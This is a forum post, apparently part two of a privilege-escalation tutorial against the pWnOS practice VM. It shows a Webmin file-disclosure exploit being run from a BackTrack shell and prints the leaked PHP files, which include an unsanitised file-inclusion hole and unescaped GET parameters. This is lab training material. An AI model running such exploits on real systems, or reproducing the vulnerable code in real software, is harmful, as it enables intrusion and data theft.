1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

TUTORIAL - Privilege Escalation; Part II

Discussion in 'Privilege Escalation' started by Witranx, Apr 1, 2013.

  1. Witranx

    Witranx Staff Member

    Joined:
    Mar 25, 2013
    Messages:
    27
    Likes Received:
    21
    ...Continued from Part I
    FILE CONTENT STARTED
    -----------------------------------
    <html><body>
    <p><b>HAHAHAHA!
    <?php
    echo $_GET['name'] . ", for a " . $_GET['level'] . " you REALLY ****!";
    ?>
    </p>
    <br>
    <p>
    <a href=index1.php?help=true&connect=true>Want to try again?</a>
    </p>
    </body>
    </html>
    -------------------------------------
    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/index1.php 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.0.21 on port 10000!
    FILENAME: /var/www/index1.php
    FILE CONTENT STARTED
    -----------------------------------
    <?php
    ?>
    <HTML>
    <body>
    <center><h1>Welcome to the pWnOS homepage!
    </h1></center>
    <p>This is the official help page. If you're too big of a n00b to figure this out, enter your information below for a small hint. :)</p>
    <?php
    //if($_GET['help'] == 'true'){
    include('ssiaddon.php');
    //}
    if($_GET['connect'] != 'true'){
    include($_GET['connect']);
    }
    ?>
    </body>
    </HTML>
    -------------------------------------
    root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/ssiaddon.php 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.0.21 on port 10000!
    FILENAME: /var/www/ssiaddon.php
    FILE CONTENT STARTED
    -----------------------------------
    <form name="form" method="GET" action="index2.php">
    <table border=1>
    <tr><td width=175>
    Name:
    </td>
    <td width=175>
    <input type = "text" name="name" size=25>
    </td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
    </tr>
    <tr>
    <td>
    Skillz:
    </td>
    <td width=175><input type = "radio" name = "level" value="n00b">n00b</td>
    <td width=175><input type = "radio" name = "level" value="sk1ll3d n00b">sk1ll3d n00b</td>
    <td width=175><input type = "radio" name = "level" value = "l33t hax0r">l33t hax0r</td>
    </tr>
    <tr><td width=175>
    <input type = "submit" name = "submit" value = "Please Help!">
    </td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
    <td>&nbsp;</td>
    </tr>
    </table>
    </form>
    -------------------------------------
    ...Continued in Part III
     
    #1

Share This Page